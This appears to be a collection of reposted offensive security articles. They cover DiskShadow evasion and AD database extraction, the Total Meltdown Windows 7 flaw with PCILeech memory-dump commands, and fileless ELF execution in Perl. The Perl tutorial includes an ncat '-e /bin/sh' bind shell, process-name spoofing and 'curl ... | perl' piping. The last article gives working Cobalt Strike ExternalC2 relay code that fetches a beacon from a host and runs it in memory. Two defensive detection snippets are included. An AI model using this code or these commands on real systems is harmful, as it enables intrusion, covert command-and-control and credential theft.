Under the context of a normal user in our test case, we can use several DiskShadow features without privilege (UAC) implications. In my previous testing, Vshadow had privilege constraints (e.g. external command execution could only be invoked after running a VSS operation). Additionally, DiskShadow is flexible with command switch support as previously described. DiskShadow.exe has the advantage here.

Command Line Orientation

Vshadow is “command line friendly” while DiskShadow requires use by interactive prompt or script file. Unless you have (remote) “TTY” access to a target machine, DiskShadow’s interactive prompt may not be suitable (e.g. for some backdoor shells). Additionally, there is an increased risk for detection when creating files or uploading files to a target machine. In the strict confines of this scenario, Vshadow has the advantage (although creating a text file will likely have less impact than uploading a binary; refer to the previous section).

AutoRuns Persistence & Evasion

In the previous Vshadow blog post, you may recall that Vshadow is signed with the Microsoft signing certificate. This has AutoRuns implications such that it will appear within the Default View since Microsoft signed binaries are not hidden. Since DiskShadow is signed with the Windows certificate, it is hidden from the default view. In this scenario, DiskShadow has the advantage.

Active Directory Database Extraction

If script mode is the only option for DiskShadow usage, extracting the AD database may require additional operations if assumed defaults are not valid (e.g. Shadow Volume disk name is not what we expected). Aside from crafting and running the script, a logical drive may have to be mapped on the target machine to copy out ntds.dit.
This does add an additional level of noise to the shadow copy operation. Vshadow has the advantage here.

Conclusion

All things considered, DiskShadow seems to be more compelling for operational use. However, that does not discount Vshadow (and other VSS methods for that matter) as a prospective tool used by threat agents. Vshadow has been used maliciously in the past for other reasons. For DiskShadow, Blue Teams and Network Defenders should consider the following:

Monitor the Volume Shadow Service (VSS) for random shadow creations/deletions and any activity that involves the AD database file (ntds.dit).

Monitor for suspicious instances of System Event ID 7036 (“The Volume Shadow Copy service entered the running state”) and invocation of the VSSVC.exe process.

Monitor process creation events for diskshadow.exe and spawned child processes.

Monitor for process integrity. If diskshadow.exe runs at a medium integrity, that is likely a red flag.

Monitor for instances of diskshadow.exe on client endpoints. Unless there is a business need, diskshadow.exe *should* not be present on client Windows operating systems.

Monitor for new and interesting logical drive mappings.

Inspect suspicious “AutoRuns” entries. Scrutinize signed binaries and inspect script files.

Enforce Application Whitelisting. Strict policies may prevent DiskShadow pass-thru applications from executing.

Fight the good fight, and train your users. If they see something (e.g. a weird pop up window), they should say something!

As always, if you have questions or comments, feel free to reach out to me here or on Twitter. Thank you for taking the time to read about DiskShadow!

Sursa: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
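On the defensive side, several of the monitoring recommendations in the article above can be expressed as checks over process creation events. The sketch below is only an illustration: the event dictionary and its keys ("image", "parent_image", "command_line", "integrity", "is_server") are a hypothetical normalized shape, not the schema of any particular logging product, and each finding is a prompt for review rather than proof of abuse.

```python
import ntpath


def diskshadow_findings(event: dict) -> list:
    """Return review notes for one process creation event (hypothetical schema)."""
    findings = []
    # ntpath parses Windows-style paths regardless of the analysis host's OS.
    image = ntpath.basename(event.get("image", "")).lower()
    parent = ntpath.basename(event.get("parent_image", "")).lower()

    if parent == "diskshadow.exe":
        findings.append("child process spawned by diskshadow.exe")

    if image == "diskshadow.exe":
        if event.get("integrity", "").lower() == "medium":
            findings.append("diskshadow.exe running at medium integrity")
        # Assumption: a missing "is_server" field is treated as a server host.
        if not event.get("is_server", True):
            findings.append("diskshadow.exe present on a client endpoint")
        if "/s" in event.get("command_line", "").lower().split():
            findings.append("diskshadow.exe started in script mode")

    return findings
```

Script mode is also how legitimate backup jobs drive DiskShadow, so that finding is most useful when combined with the integrity level and the identity of the script file.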
  21. Total Meltdown?

Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per second was not a good thing.

Meet the Windows 7 Meltdown patch from January. It stopped Meltdown but opened up a vulnerability way worse ... It allowed any process to read the complete memory contents at gigabytes per second, oh - it was possible to write to arbitrary memory as well.

No fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process. Exploitation was just a matter of reading and writing already mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write!

Accessing memory at over 4GB/s, dumping to disk is slower due to disk transfer speeds.

How is this possible?

In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself.

The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM. For more in-depth information about paging please have a look at Getting Physical: Extreme abuse of Intel based Paging Systems - Part 1 and Part 2.

PML4 self-referencing entry at offset 0xF68 with value 0x0000000062100867.

Windows has a special entry in this topmost PML4 page table that references itself, a self-referencing entry. In Windows 7 the PML4 self-referencing entry is fixed at position 0x1ED, offset 0xF68 (it is randomized in Windows 10). This means that the PML4 will always be mapped at the address 0xFFFFF6FB7DBED000 in virtual memory. This is normally a memory address only made available to the kernel (Supervisor).
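The numbers quoted above follow from standard x86-64 4-level paging arithmetic, and a short worked example may help. This is a sketch with illustrative function names: each table entry is 8 bytes, so index 0x1ED sits at byte offset 0xF68; using the self-referencing index at all four levels of the translation yields the virtual address at which the PML4 itself appears; and bits 0, 1 and 2 of an entry are Present, Read/Write and User/Supervisor.

```python
ENTRY_SIZE = 8            # bytes per page-table entry on x86-64
SELF_REF_INDEX = 0x1ED    # Windows 7 PML4 self-referencing slot, per the article


def entry_offset(index: int) -> int:
    """Byte offset of a table entry within its 4 KiB page table."""
    return index * ENTRY_SIZE


def self_ref_pml4_va(index: int) -> int:
    """Virtual address of the PML4 when slot `index` points back at the PML4."""
    va = 0
    # Use the same 9-bit index for PML4, PDPT, PD and PT.
    for shift in (39, 30, 21, 12):
        va |= index << shift
    # Canonical addresses sign-extend bit 47 into bits 48..63.
    if va & (1 << 47):
        va |= 0xFFFF << 48
    return va


def decode_low_flags(entry: int) -> dict:
    """Decode the three lowest permission bits of a paging-structure entry."""
    return {
        "present": bool(entry & 0x1),
        "writable": bool(entry & 0x2),
        "user": bool(entry & 0x4),
    }


print(hex(entry_offset(SELF_REF_INDEX)))        # 0xf68
print(hex(self_ref_pml4_va(SELF_REF_INDEX)))    # 0xfffff6fb7dbed000
print(decode_low_flags(0x0000000062100867))     # all three flags are True
```

For the entry value quoted in the article, the "user" flag being set is the entire bug: with it cleared, the same mapping would exist but be reachable only from kernel mode.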
Since the permission bit was erroneously set to User this meant the PML4 was mapped into every process and made available to code executing in user-mode.

"kernel address" memory addresses mapped in every process as user-mode read/write pages.

Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one has to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory.

The last '7' in the PML4e 0x0000000062100867 (from the above example) indicates that bits 0, 1, 2 are set, which means it's Present, Writable and User-mode accessible as per the description in the Intel Manual.

Excerpt from the Intel Manual: if bit 2 is set to '1', user-mode accesses are permitted.

Can I try this out myself?

Yes absolutely. The technique has been added as a memory acquisition device to the PCILeech direct memory access attack toolkit. Just download PCILeech and execute it with device type: -device totalmeltdown on a vulnerable Windows 7 system.

Dump memory to file with the command:

    pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force

If you have the Dokany file system driver installed you should be able to mount the running processes as files and folders in the Memory Process File System - with the virtual memory of the kernel and the processes as read/write. To mount the processes issue the command:

    pcileech.exe mount -device totalmeltdown

Please remember to re-install your security updates if you temporarily uninstall the latest one in order to test this vulnerability.

A vulnerable system is "exploited" and the running processes are mounted with PCILeech. Process memory maps and PML4 are accessed.

Is my system vulnerable?

Only Windows 7 x64 systems patched with the 2018-01 or 2018-02 patches are vulnerable.
If your system hasn't been patched since December 2017, or if it's patched with the 2018-03-29 patches or later, it will be secure.

Other Windows versions - such as Windows 10 or 8.1 - are completely secure with regards to this issue and have never been affected by it.

Other

I discovered this vulnerability just after it had been patched in the 2018-03 Patch Tuesday. I have not been able to correlate the vulnerability to known CVEs or other known issues.

Updates

Windows 2008R2 was vulnerable as well.

OOB security update released to fully resolve the vulnerability on 2018-03-29. CVE-2018-1038. Apply immediately if affected!

Timeline

2018-03-xx--25: Issue identified in Windows 7 x64. Issue seemed to be patched already. PoC coded. Contacted MSRC with technical description asking if OK to publish a blog entry or if I should hold off publication.

2018-03-26: Green light given by MSRC for me to publish blog entry.

2018-03-27: Published blog entry and PoC.

2018-03-28: Found out that the March patches only partially resolved the vulnerability. Contacted MSRC again.

2018-03-29: OOB security update released by Microsoft. CVE-2018-1038. Apply immediately if affected!

Huge Thank You to everyone at Microsoft that worked hard to resolve this issue. It is super impressive to be able to roll out a complex kernel update in little over a day. It was never my intention to release a fairly potent kernel 0-day publicly. I hope the above timeline explains how this could happen.

Sursa: https://blog.frizk.net/2018/03/total-meltdown.html?m=1
  22. In-Memory-Only ELF Execution (Without tmpfs)

In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).

Introduction

Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process?

Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

    The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.
Listing /proc/<PID>/fd, anonymous files look like this:

    stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
    total 0
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2) from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to achieve fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r.

    stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
    4.4.0-116-generic

On Target

Aside from execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use.

memfd_create(2)

Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file.
We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we’re using Perl’s syscall() to call memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

    stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
    asm-generic/unistd.h:#define __NR_memfd_create 279
    asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
    linux/memfd.h:#define MFD_CLOEXEC 0x0001U
    x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
    x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
    x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
    x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
    x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
    x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a constant 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall().
Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead.

Putting it together, let’s finally make our anonymous file:

    my $name = "";
    my $fd = syscall(319, $name, 1);
    if (-1 == $fd) {
            die "memfd_create: $!";
    }

We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

    stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'
    total 0
    lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted)

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it.

Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle:

    open(my $FH, '>&='.$fd) or die "open: $!";
    select((select($FH), $|=1)[0]);

We now have a file handle which refers to our anonymous file.

Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements, each of which writes a chunk of our binary to the anonymous file.
    perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\
        or die qq/write: \$!/;\n"while(<>)' ./elfbinary

This will give us many, many lines similar to:

    print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/
        or die qq/write: $!/;
    print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/
        or die qq/write: $!/;
    print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/
        or die qq/write: $!/;

Executing those puts our ELF binary into memory. Time to run it.

Optional: fork(2)

Ok, fork(2) isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like:

    while ($keep_going) {
            my $pid = fork();
            if (-1 == $pid) { # Error
                    die "fork: $!";
            }
            if (0 == $pid) { # Child
                    # Do child things here
                    exit 0;
            }
    }

Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate:

    # Spawn child
    my $pid = fork();
    if (-1 == $pid) { # Error
            die "fork1: $!";
    }
    if (0 != $pid) { # Parent terminates
            exit 0;
    }
    # In the child, become session leader
    if (-1 == syscall(112)) {
            die "setsid: $!";
    }
    # Spawn grandchild
    $pid = fork();
    if (-1 == $pid) { # Error
            die "fork2: $!";
    }
    if (0 != $pid) { # Child terminates
            exit 0;
    }
    # In the grandchild here, do grandchild things

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing.
Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albeit with easier syntax.

We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else.

The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

    exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!";

The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the /proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand.
Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list:

    cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"'

This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to Perl’s stdin via our local SSH client. The end result is our script is run without touching disk at all.

Without creds but with access to the target (i.e. after exploiting it), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink. If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2). Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast.

TL;DR

In C (translate to your non-disk-touching language of choice):

    fd = memfd_create("", MFD_CLOEXEC);
    write(fd, elfbuffer, elfbuffer_len);
    asprintf(&p, "/proc/self/fd/%i", fd);
    execl(p, "kittens", "arg1", "arg2", NULL);

Updated: March 31, 2018

Source: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
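The Artifacts note above says the /proc/<PID>/exe symlink is the main giveaway for a program started from an anonymous file. As a rough defensive sketch (not part of the original write-up), the Python below walks /proc and reports processes whose exe link points at a memfd. The function names are hypothetical, and the "/memfd:" prefix check is an assumption based on the `/memfd: (deleted)` link target shown in the listing earlier in the post.

```python
import os

def is_memfd_target(target):
    """True if a /proc/<PID>/exe link target looks like an anonymous memfd file."""
    # Assumption: memfd-backed files show up as "/memfd:<name> (deleted)".
    return target.startswith("/memfd:")

def find_memfd_processes(proc_root="/proc"):
    """Return (pid, target) pairs for processes whose exe link is a memfd."""
    hits = []
    try:
        entries = os.listdir(proc_root)
    except OSError:
        return hits  # no procfs here (non-Linux host, restricted sandbox, ...)
    for entry in entries:
        if not entry.isdigit():
            continue  # skip non-process entries such as "meminfo"
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # process exited, kernel thread, or permission denied
        if is_memfd_target(target):
            hits.append((int(entry), target))
    return hits
```

Calling `find_memfd_processes()` as root gives the widest view; as an unprivileged user it only sees exe links the caller is allowed to read.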
  23. Exploring Cobalt Strike's ExternalC2 framework Posted on 30th March 2018 As many testers will know, achieving C2 communication can sometimes be a pain. Whether because of egress firewall rules or process restrictions, the simple days of reverse shells and reverse HTTP C2 channels are quickly coming to an end. OK, maybe I exaggerated that a bit, but it's certainly becoming harder. So, I wanted to look at some alternate routes to achieve C2 communication and with this, I came across Cobalt Strike’s ExternalC2 framework. ExternalC2 ExternalC2 is a specification/framework introduced by Cobalt Strike, which allows hackers to extend the default HTTP(S)/DNS/SMB C2 communication channels offered. The full specification can be downloaded here. Essentially this works by allowing the user to develop a number of components: Third-Party Controller - Responsible for creating a connection to the Cobalt Strike TeamServer, and communicating with a Third-Party Client on the target host using a custom C2 channel. Third-Party Client - Responsible for communicating with the Third-Party Controller using a custom C2 channel, and relaying commands to the SMB Beacon. SMB Beacon - The standard beacon which will be executed on the victim host. Using the diagram from CS's documentation, we can see just how this all fits together: Here we can see that our custom C2 channel is transmitted between the Third-Party Controller and the Third-Party Client, both of which we can develop and control. Now, before we roll up our sleeves, we need to understand how to communicate with the Team Server ExternalC2 interface. First, we need to tell Cobalt Strike to start ExternalC2. This is done with an aggressor script calling the externalc2_start function, and passing a port. Once the ExternalC2 service is up and running, we need to communicate using a custom protocol. 
The protocol is actually pretty straightforward, consisting of a 4 byte little-endian length field followed by a blob of data.

To begin communication, our Third-Party Controller opens a connection to TeamServer and sends a number of options:

arch - The architecture of the beacon to be used (x86 or x64).
pipename - The name of the pipe used to communicate with the beacon.
block - Time in milliseconds that TeamServer will block between tasks.

Once each option has been sent, the Third-Party Controller sends a go command. This starts the ExternalC2 communication, and causes a beacon to be generated and sent. The Third-Party Controller then relays this SMB beacon payload to the Third-Party Client, which then needs to spawn the SMB beacon.

Once the SMB beacon has been spawned on the victim host, we need to establish a connection to enable passing of commands. This is done over a named pipe, and the protocol used between the Third-Party Client and the SMB Beacon is exactly the same as between the Third-Party Client and Third-Party Controller... a 4 byte little-endian length field, and trailing data.

OK, enough theory, let’s create a “Hello World” example to simply relay the communication over a network.

Hello World ExternalC2 Example

For this example, we will be using Python on the server side for our Third-Party Controller, and C for our client side Third-Party Client. First, we need our aggressor script to tell Cobalt Strike to enable ExternalC2:

    # start the External C2 server and bind to 0.0.0.0:2222
    externalc2_start("0.0.0.0", 2222);

This opens up ExternalC2 on 0.0.0.0:2222. Now that ExternalC2 is up and running, we can create our Third-Party Controller. Let’s first establish our connection to the TeamServer ExternalC2 interface:

    import socket

    _socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
    _socketTS.connect(("127.0.0.1", 2222))

Once established, we need to send over our options.
We will create a few quick helper functions to allow us to prefix our 4 byte length without manually crafting it each time:

    import struct

    def encodeFrame(data):
        # 4 byte little-endian length, followed by the data itself
        return struct.pack("<I", len(data)) + data

    def sendToTS(data):
        _socketTS.sendall(encodeFrame(data))

Now we can use these helper functions to send over our options:

    # Send out config options (bytes, as required by Python 3 sockets)
    sendToTS(b"arch=x86")
    sendToTS(b"pipename=xpntest")
    sendToTS(b"block=500")
    sendToTS(b"go")

Now that Cobalt Strike knows we want an x86 SMB Beacon, we need to receive data. Again let’s create a few helper functions to handle the decoding of packets rather than manually decoding each time:

    def decodeFrame(data):
        # The first 4 bytes hold the length; everything after is the body
        length = struct.unpack("<I", data[0:4])[0]
        body = data[4:]
        return (length, body)

    def recvFromTS():
        data = b""
        _len = _socketTS.recv(4)
        l = struct.unpack("<I", _len)[0]
        # Keep reading until the whole frame body has arrived
        while len(data) < l:
            data += _socketTS.recv(l - len(data))
        return data

This allows us to receive raw data with:

    data = recvFromTS()

Next, we need to allow our Third-Party Client to connect to us using a C2 protocol of our choice. For now, we are simply going to use the same 4 byte length packet format for our C2 channel protocol. So first, we need a socket for the Third-Party Client to connect to:

    _socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
    _socketBeacon.bind(("0.0.0.0", 8081))
    _socketBeacon.listen(1)
    _socketClient = _socketBeacon.accept()[0]

Then, once a connection is received, we enter our recv/send loop where we receive data from the victim host, forward this onto Cobalt Strike, and receive data from Cobalt Strike, forwarding this to our victim host:

    while True:
        print("Sending %d bytes to beacon" % len(data))
        sendToBeacon(data)
        data = recvFromBeacon()
        print("Received %d bytes from beacon" % len(data))
        print("Sending %d bytes to TS" % len(data))
        sendToTS(data)
        data = recvFromTS()
        print("Received %d bytes from TS" % len(data))

Our finished example can be found here. Now we have a working controller, we need to create our Third-Party Client.
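To make the framing concrete, here is a small self-contained Python 3 sketch of the 4 byte little-endian length prefix described above. It is an illustration only: the names encode_frame, recv_exact, recv_frame and demo are hypothetical, and a local socket pair stands in for the real TeamServer connection.

```python
import socket
import struct

def encode_frame(data):
    """Prefix data with its length as a 4 byte little-endian integer."""
    return struct.pack("<I", len(data)) + data

def recv_exact(sock, n):
    """Read exactly n bytes, looping because recv() may return fewer."""
    chunks = []
    remaining = n
    while remaining:
        chunk = sock.recv(remaining)
        if not chunk:
            raise ConnectionError("peer closed the connection mid-frame")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)

def recv_frame(sock):
    """Read one length-prefixed frame and return its body."""
    (length,) = struct.unpack("<I", recv_exact(sock, 4))
    return recv_exact(sock, length)

def demo():
    """Send the four option frames over a local socket pair and read them back."""
    sender, receiver = socket.socketpair()
    try:
        for option in (b"arch=x86", b"pipename=xpntest", b"block=500", b"go"):
            sender.sendall(encode_frame(option))
        return [recv_frame(receiver) for _ in range(4)]
    finally:
        sender.close()
        receiver.close()
```

Reading the 4 byte header through recv_exact as well guards against a short read splitting the length field, which a bare recv(4) does not.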
To make things a bit easier, we will use win32 and C for this, giving us access to the native Windows API. Let’s start with a few helper functions. First, we need to connect to the Third-Party Controller. Here we will simply use WinSock2 to establish a TCP connection to the controller:

    // Creates a new C2 controller connection for relaying commands
    SOCKET createC2Socket(const char *addr, WORD port) {
        WSADATA wsd;
        SOCKET sd;
        SOCKADDR_IN sin;
        WSAStartup(0x0202, &wsd);
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(port);
        sin.sin_addr.S_un.S_addr = inet_addr(addr);
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
        connect(sd, (SOCKADDR*)&sin, sizeof(sin));
        return sd;
    }

Next, we need a way to receive data. This is similar to what we saw in our Python code, with our length prefix being used as an indicator as to how many data bytes we are receiving:

    // Receives data from our C2 controller to be relayed to the injected beacon
    char *recvData(SOCKET sd, DWORD *len) {
        char *buffer;
        DWORD bytesReceived = 0, totalLen = 0;
        *len = 0;
        recv(sd, (char *)len, 4, 0);
        buffer = (char *)malloc(*len);
        if (buffer == NULL)
            return NULL;
        while (totalLen < *len) {
            bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0);
            totalLen += bytesReceived;
        }
        return buffer;
    }

Similarly, we need a way to return data over our C2 channel to the Controller:

    // Sends data to our C2 controller received from our injected beacon
    void sendData(SOCKET sd, const char *data, DWORD len) {
        char *buffer = (char *)malloc(len + 4);
        if (buffer == NULL)
            return;
        DWORD bytesWritten = 0, totalLen = 0;
        // 4 byte length prefix, then the data
        *(DWORD *)buffer = len;
        memcpy(buffer + 4, data, len);
        while (totalLen < len + 4) {
            bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0);
            totalLen += bytesWritten;
        }
        free(buffer);
    }

Now we have the ability to communicate with our Controller, the first thing we want to do is to receive the beacon payload.
This will be a raw x86 or x64 payload (depending on the options passed by the Third-Party Controller to Cobalt Strike), and is expected to be copied into memory before being executed. For example, let’s grab the beacon payload:

    // Create a connection back to our C2 controller
    SOCKET c2socket = createC2Socket("192.168.1.65", 8081);
    payloadData = recvData(c2socket, &payloadLen);

And then for the purposes of this demo, we will use the Win32 VirtualAlloc function to allocate an executable range of memory, and CreateThread to execute the code:

    HANDLE threadHandle;
    DWORD threadId = 0;
    char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (alloc == NULL)
        return;
    memcpy(alloc, payload, len);
    // Second argument is the stack size; 0 selects the default
    threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId);

Once the SMB Beacon is up and running, we need to connect to its named pipe. To do this, we will just repeatedly attempt to connect to our \\.\pipe\xpntest pipe (remember, this pipename was passed as an option earlier on, and will be used by the SMB Beacon to receive commands):

    // Loop until the pipe is up and ready to use
    while (beaconPipe == INVALID_HANDLE_VALUE) {
        // Create our IPC pipe for talking to the C2 beacon
        Sleep(500);
        beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest");
    }

And then, once we have a connection, we can continue with our send/recv loop:

    while (true) {
        // Start the pipe dance
        payloadData = recvFromBeacon(beaconPipe, &payloadLen);
        if (payloadLen == 0) break;
        sendData(c2socket, payloadData, payloadLen);
        free(payloadData);
        payloadData = recvData(c2socket, &payloadLen);
        if (payloadLen == 0) break;
        sendToBeacon(beaconPipe, payloadData, payloadLen);
        free(payloadData);
    }

And that’s it, we have the basics of our ExternalC2 service set up. The full code for the Third-Party Client can be found here. Now, onto something a bit more interesting.
Transfer C2 over file

Let’s recap on what it is we control when attempting to create a custom C2 protocol: the data transfer between the Third-Party Controller and Third-Party Client is where we get to have some fun. Taking our previous "Hello World" example, let’s attempt to port this into something a bit more interesting, transferring data over a file read/write.

Why would we want to do this? Well, let’s say we are in a Windows domain environment and compromise a machine with very limited outbound access. One thing that is permitted however is access to a file share... see where I’m going with this? By writing C2 data from a machine with access to our C2 server into a file on the share, and reading the data from the firewall’d machine, we have a way to run our Cobalt Strike beacon.

